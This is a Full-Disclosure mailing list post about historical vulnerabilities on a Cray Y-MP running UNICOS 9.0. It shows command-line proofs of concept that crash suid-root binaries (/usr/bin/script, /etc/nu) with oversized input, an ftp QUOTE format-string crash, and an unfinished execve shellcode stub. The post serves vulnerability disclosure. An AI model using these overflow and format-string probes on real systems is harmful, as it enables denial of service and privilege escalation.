Cray PVP Exploitation (Historical Hacking)
=========================================
------------------[ Misc CPU information
This Cray Y-MP EL with 4 CPUs and 1 GB of RAM is
running UNICOS Release 9.0
[EMAIL PROTECTED] guest]$ uname -a
sn5176 sn5176 9.0.2.2 sin.0 CRAY Y-MP
[EMAIL PROTECTED] guest]$ df
/ (/dev/dsk/root ): 129232 .5K blocks
( 14.7%) 25880 I-nodes
/tmp (/dev/dsk/tmp ): 1966952 .5K blocks
( 98.3%) 62402 I-nodes
/usr (/dev/dsk/usr ): 7016 .5K blocks
( 0.5%) 22571 I-nodes
/usr/src (/dev/dsk/src ): 429312 .5K blocks
( 44.7%) 25958 I-nodes
/adddisk1 (/dev/dsk/opt ): 704760 .5K blocks
( 58.7%) 31671 I-nodes
/proc (/proc ): 2007520 .5K blocks
( 97.6%) 629 procs
/onserver (server:/disk1/exports/yel):
54180728 .5K blocks
( 70.4%)
/home (server:/disk1/home):
54180728 .5K blocks
( 70.4%)
/var/sysinfo (server:/var/sysinfo):
7389440 .5K blocks
( 61.7%)
/secure (server:/secure ): 7389440 .5K blocks
( 61.7%)
==================[ Vulnerabilities
------------------[ /usr/bin/script suid root command
line args buffer overflow
-rwsr-xr-x 1 root bin 730000 Sep 5 1996
/usr/bin/script
[EMAIL PROTECTED] guest]$ script `perl -e 'print "A"x1000'`
Operand range error (core dumped)
------------------[ /etc/nu suid root file parsing
buffer overflow
-rwsr-xr-x 1 root bin 1045400 Sep 4 1996
/etc/nu
[EMAIL PROTECTED] guest]$ echo "" >> /tmp/acid
[EMAIL PROTECTED] guest]$ udbgen -p /tmp
udbgen: An acid file with at least one line is
required
Acid format: 'account_name:account_id'
udbgen: /tmp/group: No such file or directory
udbgen: A group file with at least one line is
required
Group format: 'group_name:*:group_id:'
[EMAIL PROTECTED] guest]$ echo `perl -e 'print "A"x10000'` >>
/tmp/script
[EMAIL PROTECTED] guest]$ /etc/nu -p /tmp -c /tmp/script -a
admin/udb/nu/nu.c 90.7 09/03/96 10:43:53
(sn5176:/tmp/script)
nu: no GroupHome information in /tmp/script
Operand range error (core dumped)
-----------------[ /bin/ftp QUOTE format string vuln
(BSD ftp client bug) [non suid]
ftp> quote %08x.%08x.%08x.%08x.
500
'C00000000001D496.253038782E253038.782E253038782E25.3038782E0000001B.':
command not understood.
ftp> quote %n%n%n%n%n
Operand range error (core dumped)
-----------------[ UNICOS Shellcoding CRAY PVP
The CRAY PVP does not natively support a 'syscall'
instruction(unlike the new Cray X1, where
the OS node provides a system call interface to the
other nodes.) instead, we will use the
systems standard libaries (which are linked in to
most, if not all applications). Particularly
we will focus on 'libu.a', which provides the UNICOS
Standard Library.
** INCOMPLETE **
[EMAIL PROTECTED] guest]$ as -f myfile.s
[EMAIL PROTECTED] guest]$ segldr -e MAIN myfile.o -lu
ldr-240 segldr: CAUTION
Entry point 'MAIN' in module 'PROG1' from file
'myfile.o' was specified on
an XFER directive but is not a primary entry.
[EMAIL PROTECTED] guest]$ ./a.out
[EMAIL PROTECTED] guest]$ cat myfile.s
IDENT PROG1
MAIN ENTER
CALL execve ;; arguements required.
EXIT
END
[EMAIL PROTECTED] guest]$
------------------[ Documentation sites
http://oscinfo.osc.edu:8080/dynaweb/@CategoryView
http://dynaweb.tacc.utexas.edu:8080/dynaweb/@DisplayHomepage
http://www.cray.com/
___________________________________________________________
NEW Yahoo! Cars - sell your car and browse thousands of new and used cars
online! http://uk.cars.yahoo.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
